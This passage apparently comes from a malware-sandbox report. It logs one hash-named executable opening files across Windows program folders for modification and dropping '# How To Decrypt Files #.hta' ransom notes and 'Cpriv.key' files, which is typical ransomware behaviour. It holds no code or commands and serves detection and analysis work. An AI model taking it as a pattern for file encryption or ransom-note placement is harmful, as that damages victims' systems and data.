Files\Microsoft Office\CLIPART\PUB60COR\SY01572_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\cs.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\RMNSQUE\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00586_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153265.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\ACADEMIC.ONE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\service.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\WEBPAGE.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)greenStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\EDGE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImagesMask256Colors.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\highDpiImageSwap.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_VelvetRose.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\CrashReports\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EXPLR_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18206_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115843.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Shorthand.emf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\about.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssLogo.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_hail.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Pushpin.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\ONLINE.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0293570.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15023_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\JUNGLE.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Mail\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01080_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0216516.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21312_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\slideshow_glass_frame.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\BloodPressureTracker.xltx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw48.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00720_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00712_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0285410.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\PIXEL\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02950_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14752_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GRAPH_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonUp_Off.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\OneNote.en-us\OneNoteMUI.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03668_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\gadget.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BREEZE\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Internet Explorer\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\splash.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Documentation\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\CT_ROOTS.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\msadc\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\profile.jfc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupiconsmask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_orange.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\CANYON\CANYON.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_m.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_sml.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\SETLANG_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\alertIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00439_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00578_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\flyout.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Word.en-us\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01296_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ESEN\WT61ES.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\SETLANG_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18239_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21377_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\ENV11.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\InstallBackup.cab de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Groove.en-us\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00074_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\PAWPRINT.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\msadc\adcvbs.inc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Notebook.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VBA\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Smart Tag\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00681_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01246_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24Images.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft SQL Server Compact Edition\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\tools.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\VOLTAGE.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01294_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00152_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00935_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\IPMS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN103.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\OFFISUPP.HTM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe\Help\en_US\Adobe Reader\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\hi.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt_1.1.1.v20140903-0821.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0252629.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\DELIMWIN.FAE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\MedianMergeFax.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00117_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18230_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Slate\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00780L.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Bibliography\Style\SIST02.XSL 